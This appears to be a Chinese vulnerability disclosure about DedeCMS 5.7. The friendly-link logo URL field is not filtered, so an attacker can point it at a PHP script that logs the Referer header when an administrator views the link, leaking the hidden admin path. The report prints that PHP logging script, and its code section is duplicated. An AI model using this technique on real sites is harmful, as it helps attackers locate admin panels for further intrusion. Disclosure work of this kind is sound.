利用织梦漏洞寻找后台

简要描述:


某处设计缺陷,程序对某些东西过滤不严,导致后台地址泄露,仅测试了5.7。目测其它版本同样存在问题。

详细说明:


20150804112117_89466.png



DEDECMS对友情链接申请的LOGO地址没有进行严格的判断和过滤,导致可以提交PHP、ASP等后缀。


且后台查看友情链接时,如下图所示,图片仍是申请时提交的URL。


20150804112117_48361.png


X.PHP 代码:




<?php


file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);


header("Content-type:image/jpeg");


$img=imagecreatefromjpeg("x.jpg");


imagejpeg($img);


imagedestroy($img);


?>




当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。


20150804112117_63176.png



漏洞证明:


20150804112117_48361.png


X.PHP 代码:




<?php


file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);


header("Content-type:image/jpeg");


$img=imagecreatefromjpeg("x.jpg");


imagejpeg($img);


imagedestroy($img);


?>




当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。


20150804112117_63176.png


评论回复